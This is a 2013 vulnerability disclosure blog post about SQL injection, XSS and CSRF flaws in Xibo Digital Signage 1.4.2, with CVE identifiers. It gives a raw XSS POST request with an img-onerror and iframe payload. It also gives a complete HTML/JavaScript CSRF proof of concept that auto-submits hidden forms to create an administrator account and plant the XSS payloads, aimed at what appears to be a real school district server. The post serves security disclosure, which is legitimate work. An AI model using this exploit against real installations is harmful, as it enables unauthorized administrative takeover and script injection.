Wednesday, August 21, 2013

[Exploit] Xibo - Digital Signage SQL Injection, XSS, CSRF

# Title: Xibo - Digital Signage SQL Injection, XSS, CSRF
# Discovered and Reported: July 2013
# Discovered/Exploited By: Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators
# Exploit/Advisory: http://infosec42.blogspot.com/
# Software: Xibo 1.4.2 - http://xibo.org.uk/get-xibo/
# Version Tested: Xibo 1.4.2 (Other versions were not tested and may be vulnerable.)
# CVE: SQL Injection - CVE-2013-4887, XSS - CVE-2013-4888, CSRF - CVE-2013-4889



SQL Injection Vulnerability - CVE-2013-4887
 Figure 1 - JSON Error

Figure 2 - Xibo application log containing a SQL error that corresponds to JSON error


Figure 3 - JSON data containing the result of a successful SQL query

Figure 4 - Client side HTML code was modified to reflect the query demonstrated in figure 3


Cross-Site Scripting (XSS) Vulnerability - CVE-2013-4888

POST:  /index.php?p=layout&q=add&ajax=true
Data: layoutid=0&layout=Gimppy%3Cimg+src%3D42+onerror%3D'alert(%22InfoSec42%22)'%3E&description=%3Ciframe+src%3D'http%3A%2F%2Fsecurityevaluators.com'+width%3D1000+height%3D1000%3C%2Fiframe%3E&tags=&templateid=0

Figure 5 - JSON data indicating a successful request

Figure 6 - Rendered page containing injected HTML iframe and img tags


Cross-Site Request Forgery (CSRF) Vulnerability - CVE-2013-4889

The following JavaScript PoC will create an Xibo administrative user and also set the XSS payloads discussed above.

<html>
<head>
<title> Xibo - Digital Signage 1.4.2 CSRF Exploit.</title>
<!--
# CSRF Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators
# Exploited by: Jacob Holcomb - Security Analyst @ Independnet Security Evaluators
# CVE: CSRF - CVE-2013-4889, XSS - CVE-2013-4888
# http://infosec42.blogspot.com
# http://securityevaluators.com
-->
</head>
<body>
<h1>Please wait... </h1>
<script type="text/javascript">
//Add super user
function RF1(){
    document.write('<form name="addAdmin" target ="_blank" action="http://xibo.leland.k12.mi.us/index.php?p=user&q=AddUser&ajax=true" method="post">'+
    '<input type="hidden" name="userid" value="0">'+
    '<input type="hidden" name="username" value="Gimppy">'+
    '<input type="hidden" name="password" value="ISE">'+
    '<input type="hidden" name="email" value="Gimppy@infosec42.com">'+
    '<input type="hidden" name="usertypeid" value="1">'+
    '<input type="hidden" name="groupid" value="1">'+
    '</form>');
}

//Set XSS Payloads
function RF2(){
    document.write('<form name="addXSS" target="_blank" action="http://xibo.leland.k12.mi.us/index.php?p=layout&q=add&ajax=true" method="post">'+
    '<input type="hidden" name="layoutid" value="0">'+
    '<input type="hidden" name="layout" value="Gimppy<img src=42 onerror=\'alert(42)\'>">'+
    '<input type="hidden" name="description" value="<iframe src=\'http://securityevaluators.com\' width=100 height=1000</iframe>">'+
    '<input type="hidden" name="tags" value="">'+
    '<input type="hidden" name="templateid" value="0">'+
    '</form>');
}

function createPage(){
    RF1();
    RF2();
}

function _addAdmin(){
    document.addAdmin.submit();
}

function _addXSS(){
    document.addXSS.submit();
}

//Called Functions
createPage()
   
for (var i = 0; i < 2; i++){
    if(i == 0){
        window.setTimeout(_addAdmin, 0500);
    }
    else if(i == 1){
        window.setTimeout(_addXSS, 1000);
    }
    else{
        continue;
    }
}
</script>
</body>
</html>












2 comments:

  1. I have read this post. collection of post is a nice one. Thank you for this great sharing. Digital Signage.

    ReplyDelete